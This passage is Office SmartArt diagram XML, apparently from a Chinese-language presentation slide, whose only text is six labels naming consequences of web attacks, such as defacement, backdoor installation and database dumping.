    <dgm:cxn modelId="{89D3387D-F3FE-4D67-B33A-539AD90BBC45}" type="presParOf" srcId="{5E110573-EE9D-4465-B1FA-037D0FBE12B8}" destId="{4DD97DA6-5D8C-4D3E-8416-4783DA8609F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{67327D5A-5B56-404F-9A5D-26E98B6B3500}" type="presParOf" srcId="{5E110573-EE9D-4465-B1FA-037D0FBE12B8}" destId="{92473174-74F4-480B-B164-4823633F3B13}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{DDDD2EBA-8DA8-41EA-8C9F-AFC3EB89A6B6}" type="presParOf" srcId="{B3086D6B-4057-4877-BD76-3BFC57C5BF6F}" destId="{C5DC2B0E-9423-4445-B07B-E6C8BE3E1CA1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{15537B80-6483-4B7B-B804-5028D588D519}" type="presParOf" srcId="{B3086D6B-4057-4877-BD76-3BFC57C5BF6F}" destId="{46292C01-6290-49E6-A350-CDCA0831E531}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{5EA10FC3-4344-4DD3-9904-42A2A9479C08}" type="presParOf" srcId="{04E25477-0BF9-484B-A856-DC8B1C5359AB}" destId="{8552433B-9BB3-4615-8FB7-BF2578B47590}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{8FFFA247-9F97-4C77-A560-7F8EA10DCBE3}" type="presParOf" srcId="{04E25477-0BF9-484B-A856-DC8B1C5359AB}" destId="{74DEE159-00B6-4172-8A5B-9E158DDB0285}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{7E89AC6E-6BA0-4BE0-8E1F-BC570F6C07EA}" type="presParOf" srcId="{74DEE159-00B6-4172-8A5B-9E158DDB0285}" destId="{DC70F906-4008-49F2-96B0-27AD8CFE9100}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{ABC4B556-AF47-4017-B1FF-61AE9342A972}" type="presParOf" srcId="{DC70F906-4008-49F2-96B0-27AD8CFE9100}" destId="{2DE82A59-8D26-495B-A66F-0961B6E6109E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{C6F37751-1927-47F2-95BF-2273CEBF7A2C}" type="presParOf" srcId="{DC70F906-4008-49F2-96B0-27AD8CFE9100}" destId="{22A050DA-9DD9-403B-8423-47730FEA7DDA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{6AA9CE06-DAD9-45B5-8D69-84900FD39CE0}" type="presParOf" srcId="{74DEE159-00B6-4172-8A5B-9E158DDB0285}" destId="{A2A13AB2-00DE-4930-B6BF-5EC019604A6A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{37086445-B0B5-41E7-A84C-80DCA0ED8685}" type="presParOf" srcId="{74DEE159-00B6-4172-8A5B-9E158DDB0285}" destId="{61E3F440-CAFB-4B46-8E5D-85CC7FECE034}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{C1A80B6B-7EE2-48E7-AF84-32F02CC8CAF3}" type="presParOf" srcId="{31B0F006-6B56-4E62-B191-3658468C5FB2}" destId="{D8C8C661-CBB0-459A-A9C8-02C481A3C079}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{3D10128C-634C-45A9-AC88-77F770F33158}" type="presParOf" srcId="{528143D8-D62F-42F5-B995-C85A15BAB04A}" destId="{9F7F2F8F-6C4B-472A-92F8-48A9438FB778}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1"/>
    <dgm:cxn modelId="{06BD7130-1C9D-4F35-BCE7-2E4583C3F2D0}" type="presParOf" srcId="{06BFCB80-9AFC-46C1-ADD1-532B4EE76AEF}" destId="{6F9B0569-59CB-4F45-967D-F87E179917AC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4D2E9-642A-4767-B794-B8E0BAE8DBDC}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple2#1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E7CE103F-1BD0-4B49-877E-C6F681B67092}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>数据库恶意操作（修改金额）</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6944ABA-4A8E-4602-BC54-32ADE84A36F5}" type="parTrans" cxnId="{67618A67-8365-4867-8923-9753C10F8D97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27FB2DDC-BDEE-42A2-97DF-C883D058C5A5}" type="sibTrans" cxnId="{67618A67-8365-4867-8923-9753C10F8D97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>网站挂马（植入网页木马）</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{973600C3-6275-4FAB-BB2C-957C2CF36307}" type="parTrans" cxnId="{D0B8A9A2-C368-4B4F-85EE-EB5791860C32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3950B3C-209F-4945-8B4B-9E65CE224F51}" type="sibTrans" cxnId="{D0B8A9A2-C368-4B4F-85EE-EB5791860C32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD664396-1E55-4208-8738-450A006C6DE6}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>网页篡改（挂标语）</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{233AE539-9CDA-4967-AA7D-2E261BC19CEF}" type="parTrans" cxnId="{FD9FB551-5E99-406F-8199-1C2F38780C06}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBEC06D-9216-46CB-9198-77414934807B}" type="sibTrans" cxnId="{FD9FB551-5E99-406F-8199-1C2F38780C06}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>安装后门</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A55469F-84F0-47D4-8FAF-52B424B28559}" type="parTrans" cxnId="{7D122732-FE38-4C4D-8807-B863BA2E8FC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{925218ED-43F9-484F-A58B-21043DF084C7}" type="sibTrans" cxnId="{7D122732-FE38-4C4D-8807-B863BA2E8FC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>获取系统权限</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DB46EC8-4E34-44F2-80AE-9104EC34778E}" type="parTrans" cxnId="{1613A2F1-53F7-4FE1-81DC-4B1C50B17106}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF1E424-B6C1-4B73-A93D-851B0851F62D}" type="sibTrans" cxnId="{1613A2F1-53F7-4FE1-81DC-4B1C50B17106}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>数据库信息泄漏（拖库）</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4028D6C-0EB6-41E2-A633-5EE8D94DF32F}" type="parTrans" cxnId="{4B4CF363-8AAD-454E-84B5-E643F54D6967}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{063FFE7C-448F-494A-B27F-5E86C803817F}" type="sibTrans" cxnId="{4B4CF363-8AAD-454E-84B5-E643F54D6967}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" type="pres">
      <dgm:prSet presAssocID="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" type="pres">
      <dgm:prSet presAssocID="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{354B2A59-965A-4E0C-AADB-838746803B06}" type="pres">
      <dgm:prSet presAssocID="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49D67C0F-16AB-4B9C-88D2-EF03126FDE4F}" type="pres">
      <dgm:prSet presAssocID="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{821C923F-AFD1-45DC-9DED-96127DED69DF}" type="pres">
      <dgm:prSet presAssocID="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{249D4689-4D15-444B-AA15-34F085DE39DB}" type="pres">
      <dgm:prSet presAssocID="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6314FA40-1456-4868-9F66-B25FD8913865}" type="pres">
      <dgm:prSet presAssocID="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{97D90C10-B72B-465C-A840-9720E5568AD5}" type="pres">
      <dgm:prSet presAssocID="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7DFD1B01-F7C4-46E4-81A0-8CA0673B8863}" type="pres">
      <dgm:prSet presAssocID="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" type="pres">
      <dgm:prSet presAssocID="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27E2EEAE-5C97-495E-ACB7-4AAF84EE813F}" type="pres">
      <dgm:prSet presAssocID="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F27C2BB-3790-43A6-B3FC-42170389D648}" type="pres">
      <dgm:prSet presAssocID="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33DECCE9-3F47-4DD2-BFA6-E970E2AB1644}" type="pres">
      <dgm:prSet presAssocID="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" type="pres">
      <dgm:prSet presAssocID="{AD664396-1E55-4208-8738-450A006C6DE6}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7497B053-F8DD-4A62-BFF5-E3E51018DD07}" type="pres">
      <dgm:prSet presAssocID="{AD664396-1E55-4208-8738-450A006C6DE6}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23C658F0-65FC-4131-A97D-246EAA5ECAD3}" type="pres">
      <dgm:prSet presAssocID="{AD664396-1E55-4208-8738-450A006C6DE6}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60FD5D8B-9F66-4838-94DA-76FA5D4CCB13}" type="pres">
      <dgm:prSet presAssocID="{AD664396-1E55-4208-8738-450A006C6DE6}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" type="pres">
      <dgm:prSet presAssocID="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4822013A-C343-43D2-97CF-C1BDC47DE091}" type="pres">
      <dgm:prSet presAssocID="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2278B80B-133A-45A7-AC6E-38851CED986C}" type="pres">
      <dgm:prSet presAssocID="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{898168FD-4B68-4DD6-82B5-0F37B3C2E0C2}" type="pres">
      <dgm:prSet presAssocID="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" type="pres">
      <dgm:prSet presAssocID="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50A3536C-94AA-4AD6-976A-74FB22FEF420}" type="pres">
      <dgm:prSet presAssocID="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30A5B66D-80B2-49F9-90B4-359B4D9DBA78}" type="pres">
      <dgm:prSet presAssocID="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1567578-90E9-4C1F-AA15-627382938DDE}" type="pres">
      <dgm:prSet presAssocID="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7D122732-FE38-4C4D-8807-B863BA2E8FC7}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" srcOrd="4" destOrd="0" parTransId="{7A55469F-84F0-47D4-8FAF-52B424B28559}" sibTransId="{925218ED-43F9-484F-A58B-21043DF084C7}"/>
    <dgm:cxn modelId="{0854E238-0D9D-4904-96EA-CE1C5A6A4767}" type="presOf" srcId="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" destId="{7DFD1B01-F7C4-46E4-81A0-8CA0673B8863}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{4B4CF363-8AAD-454E-84B5-E643F54D6967}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" srcOrd="0" destOrd="0" parTransId="{D4028D6C-0EB6-41E2-A633-5EE8D94DF32F}" sibTransId="{063FFE7C-448F-494A-B27F-5E86C803817F}"/>
    <dgm:cxn modelId="{B70D3E65-4949-45A3-9D38-6F307101104A}" type="presOf" srcId="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" destId="{898168FD-4B68-4DD6-82B5-0F37B3C2E0C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{33F27745-7518-424A-8ACA-02373F3D614F}" type="presOf" srcId="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" destId="{33DECCE9-3F47-4DD2-BFA6-E970E2AB1644}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{67618A67-8365-4867-8923-9753C10F8D97}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" srcOrd="1" destOrd="0" parTransId="{B6944ABA-4A8E-4602-BC54-32ADE84A36F5}" sibTransId="{27FB2DDC-BDEE-42A2-97DF-C883D058C5A5}"/>
    <dgm:cxn modelId="{FD9FB551-5E99-406F-8199-1C2F38780C06}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{AD664396-1E55-4208-8738-450A006C6DE6}" srcOrd="3" destOrd="0" parTransId="{233AE539-9CDA-4967-AA7D-2E261BC19CEF}" sibTransId="{1EBEC06D-9216-46CB-9198-77414934807B}"/>
    <dgm:cxn modelId="{D0B8A9A2-C368-4B4F-85EE-EB5791860C32}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" srcOrd="2" destOrd="0" parTransId="{973600C3-6275-4FAB-BB2C-957C2CF36307}" sibTransId="{E3950B3C-209F-4945-8B4B-9E65CE224F51}"/>
    <dgm:cxn modelId="{E57136C2-5012-401E-B117-B30010E3B0CB}" type="presOf" srcId="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" destId="{A1567578-90E9-4C1F-AA15-627382938DDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{3896E0CE-B216-4D57-B2EA-AEBF432CB321}" type="presOf" srcId="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" destId="{821C923F-AFD1-45DC-9DED-96127DED69DF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{841689CF-94D7-4D2C-BEEF-D682C12AEAA3}" type="presOf" srcId="{AD664396-1E55-4208-8738-450A006C6DE6}" destId="{60FD5D8B-9F66-4838-94DA-76FA5D4CCB13}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{F8EA42E4-E1F9-4F4E-A2F4-FEA2A1D4EFD7}" type="presOf" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{1613A2F1-53F7-4FE1-81DC-4B1C50B17106}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" srcOrd="5" destOrd="0" parTransId="{6DB46EC8-4E34-44F2-80AE-9104EC34778E}" sibTransId="{2BF1E424-B6C1-4B73-A93D-851B0851F62D}"/>
    <dgm:cxn modelId="{CC772B7C-1EE2-4144-8F62-35C0CEA21D1F}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{BB12ED18-7503-4BA6-ADC6-C9F1B3AE24D9}" type="presParOf" srcId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" destId="{354B2A59-965A-4E0C-AADB-838746803B06}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{0994EEC3-6F2E-4F84-A6E8-ABDADE1A5685}" type="presParOf" srcId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" destId="{49D67C0F-16AB-4B9C-88D2-EF03126FDE4F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{A6E7D983-BCF8-4A19-850C-8E134EEA0060}" type="presParOf" srcId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" destId="{821C923F-AFD1-45DC-9DED-96127DED69DF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{F9B1B279-B928-4205-BD90-BD442D40F908}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{249D4689-4D15-444B-AA15-34F085DE39DB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{2763DC7C-D969-48F0-A1DD-FBF031AECF97}" type="presParOf" srcId="{249D4689-4D15-444B-AA15-34F085DE39DB}" destId="{6314FA40-1456-4868-9F66-B25FD8913865}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{BA146EA8-0CF1-4649-A2FF-7332619D1251}" type="presParOf" srcId="{249D4689-4D15-444B-AA15-34F085DE39DB}" destId="{97D90C10-B72B-465C-A840-9720E5568AD5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{EB2E8CB4-A003-4147-B5AB-50FDEB5D214D}" type="presParOf" srcId="{249D4689-4D15-444B-AA15-34F085DE39DB}" destId="{7DFD1B01-F7C4-46E4-81A0-8CA0673B8863}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{4AA016DE-DC88-4682-B0B5-64376768EF06}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{343960E6-0942-412A-8372-25A4F33DAAD6}" type="presParOf" srcId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" destId="{27E2EEAE-5C97-495E-ACB7-4AAF84EE813F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{7B20DB10-F7BB-4AA2-A545-AD75C29B830F}" type="presParOf" srcId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" destId="{4F27C2BB-3790-43A6-B3FC-42170389D648}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{1C863732-D766-45BD-AADD-15EFFC2FF7D9}" type="presParOf" srcId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" destId="{33DECCE9-3F47-4DD2-BFA6-E970E2AB1644}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{8F612A22-A255-4347-9177-071C8B685625}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{3583B823-F482-4B55-AE5E-B525BB8C42F6}" type="presParOf" srcId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" destId="{7497B053-F8DD-4A62-BFF5-E3E51018DD07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{DA4668C1-20CB-4DB0-B860-85D43A2F73DD}" type="presParOf" srcId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" destId="{23C658F0-65FC-4131-A97D-246EAA5ECAD3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
